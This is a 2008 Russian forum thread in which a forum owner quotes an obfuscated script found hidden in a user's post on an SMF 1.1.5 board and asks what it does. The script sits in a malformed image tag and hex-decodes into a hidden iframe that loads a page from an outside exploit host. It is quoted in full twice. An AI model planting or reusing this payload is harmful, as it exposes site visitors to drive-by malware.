HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Active XSS SMF 1.1.5
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Западло
  #1  
Старый 28.07.2008, 22:33
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию Западло
Вот такую фигню сделал мне мой пользователь форума SMF 1.1.5 (написал сообщение)
Цитата:
Его сообщение... [i*mg]http://<script>function v4766b41889697(v4766b41889a87){ function v4766b41889e64 () {return 16;} return(parseInt(v4766b41889a87,v4766b41889e64())); }function v4766b4188a634(v4766b4188aa1e){ function v4766b4188b5d6 () {return 2;} var v4766b4188ae03='';for(v4766b4188b1ec=0; v4766b4188b1ec<v4766b4188aa1e.length; v4766b4188b1ec+=v4766b4188b5d6()){ v4766b4188ae03+=(String.fromCharCode(v4766b4188969 7(v4766b4188aa1e.substr(v4766b4188b1ec, v4766b4188b5d6()))));}return v4766b4188ae03;} document.write(v4766b4188a634('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D633 939313965383662363539207372633D5C27687474703A2F2F7 3706C2E7669702D64646F732E6F72672F696E6465782E70687 03F272B4D6174682E726F756E64284D6174682E72616E646F6 D28292A39383634292B27316133346237356138635C2720776 96474683D343131206865696768743D3234207374796C653D5 C27646973706C61793A206E6F6E655C273E3C2F696672616D6 53E27293C2F5343524950543E'));</script>[/im*g]
Что это и страшно ли? Я это увидел тока когда редактировал сообщение, при простом просмотре было просто
Цитата:
Его сообщение...
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось mailbrush; 28.07.2008 в 22:38..
 
Ответить с цитированием

  #2  
Старый 28.07.2008, 22:40
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Что это и страшно ли? Я это увидел тока когда редактировал сообщение, при простом просмотре было просто
Цитата:
Его сообщение...
Значит сработал? И что эт именно за сплоит? Кукисы тырит?
 
Ответить с цитированием

  #3  
Старый 29.07.2008, 11:23
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию
Вот в коде
Код:
 [i*mg]http://<script>function v4766b41889697(v4766b41889a87){ function v4766b41889e64 () {return 16;} return(parseInt(v4766b41889a87,v4766b41889e64()));}function v4766b4188a634(v4766b4188aa1e){ function v4766b4188b5d6 () {return 2;} var v4766b4188ae03='';for(v4766b4188b1ec=0; v4766b4188b1ec<v4766b4188aa1e.length; v4766b4188b1ec+=v4766b4188b5d6()){ v4766b4188ae03+=(String.fromCharCode(v4766b41889697(v4766b4188aa1e.substr(v4766b4188b1ec, v4766b4188b5d6()))));}return v4766b4188ae03;} document.write(v4766b4188a634('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633939313965383662363539207372633D5C27687474703A2F2F73706C2E7669702D64646F732E6F72672F696E6465782E7068703F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A39383634292B27316133346237356138635C272077696474683D343131206865696768743D3234207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>[/im*g]
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Западло OLIVER Болталка 11 26.04.2005 21:05



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка

Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...